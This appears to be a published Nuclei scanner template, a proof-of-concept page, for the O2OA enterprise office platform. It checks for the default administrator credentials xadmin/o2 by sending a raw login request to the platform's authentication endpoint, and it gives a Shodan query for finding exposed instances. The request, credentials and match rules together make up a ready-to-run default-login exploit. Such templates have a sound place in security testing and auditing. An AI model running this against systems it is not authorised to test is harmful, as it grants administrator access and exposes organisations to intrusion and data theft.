O2OA is an open source and free enterprise and team office platform. It provides four major platforms portal management, process management, information management, and data management. It integrates many functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration. Meet various management and collaboration needs of enterprises.
PoC代码[已公开]
id: o2oa-default-login
info:
name: O2OA - Default Login
author: SleepingBag945
severity: high
description: |
O2OA is an open source and free enterprise and team office platform. It provides four major platforms portal management, process management, information management, and data management. It integrates many functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration. Meet various management and collaboration needs of enterprises.
classification:
cpe: cpe:2.3:a:zoneland:o2oa:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: zoneland
product: o2oa
shodan-query: title=="O2OA"
tags: o2oa,default-login,vuln
http:
- raw:
- |
POST /x_organization_assemble_authentication/jaxrs/authentication/captcha HTTP/1.1
Host: {{Hostname}}
Cookie: x-token=anonymous
Authorization: anonymous
Accept: text/html,application/json,*/*
Content-Type: application/json; charset=UTF-8
{"credential":"{{username}}","password":"{{password}}"}
payloads:
username:
- 'xadmin'
password:
- 'o2'
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"type\": \"success\""
- "distinguishedName"
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4b0a004830460221008422f29f468d825d73af24451ab18c125c8d39d0910de31969dbb5360e08c523022100d2542b4d1c03df0a55e3af3d6f7a50583c5c1e139dbc3c7bf8aea5920f4db3ac:922c64590222798bb761d5b6d8e72950